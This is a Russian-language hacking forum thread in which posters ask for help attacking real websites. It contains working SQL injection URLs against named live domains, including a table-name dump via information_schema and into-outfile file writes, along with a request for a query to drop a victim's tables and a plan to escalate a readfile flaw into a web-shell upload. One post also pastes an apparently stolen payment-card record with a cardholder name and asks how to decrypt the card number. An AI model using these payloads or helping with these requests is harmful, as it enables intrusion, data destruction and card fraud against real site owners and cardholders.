я делаю любой запрос меня перегидывает когда я делаю такой запрос +union+select+1,@@version,2,3,4,5,6+--+ даны показываются остальные запросы не работают
Подскажите пожалуйста. Чем расшифровывается вот этот код Code: 01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB
я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах вот болия полноя инфа Code: cc nameonca typeofcard id order_list_id expmm expyy total timeofcharge status purchaseid [COLOR=Red]01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB[/COLOR] Keith Stewart Visa 68 69 [COLOR=Red]1A:46:8B[/COLOR] [COLOR=Red]11:F6:FB[/COLOR] 55.98 1257444668 Waiting to charge PFP7153633
Объясните плиз, почему так вывод есть, http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+1+--+ а так нет? http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=(0)union(select(1))+--+
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
Но если не трудно можете показать на примере вот здесь список таблиц http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_concat(table_name+separator+0x3a)+from+information_schema.tables+where+table_schema=0x73776173696e676572--
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное? Интересует заливка шелла. Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось. Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного. Есть доступ к phpinfo и некоторым файлам конфигурации. Что можете подсказать?
Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.
Подскажите любой рабочий способ узнать путь к файлу? в чем тут ошибка? ?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e747874 -- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1 ?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' -- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
